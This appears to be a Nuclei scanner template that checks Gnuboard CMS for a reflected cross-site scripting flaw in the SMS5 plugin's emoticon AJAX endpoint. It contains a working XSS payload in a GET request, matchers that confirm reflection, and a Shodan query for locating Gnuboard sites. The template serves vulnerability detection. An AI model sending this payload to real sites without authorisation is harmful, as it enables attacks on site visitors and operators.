id: gnuboard-sms-xss

info:
  name: Gnuboard CMS - Cross-Site Scripting
  author: gy741
  severity: medium
  description: Gnuboard CMS contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary JavaScript into the responses returned by the server.
  reference:
    - https://sir.kr/g5_pds/4788?page=5
    - https://github.com/gnuboard/gnuboard5/commit/8182cac90d2ee2f9da06469ecba759170e782ee3
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  metadata:
    verified: true
    shodan-query: http.html:"Gnuboard"
  tags: xss,gnuboard

requests:
  - method: GET
    path:
      - "{{BaseURL}}/plugin/sms5/ajax.sms_emoticon.php?arr_ajax_msg=gnuboard<svg+onload=alert(document.domain)>"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"0nuboard<svg onload=alert(document.domain)>"'

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200

# Enhanced by md on 2022/09/19
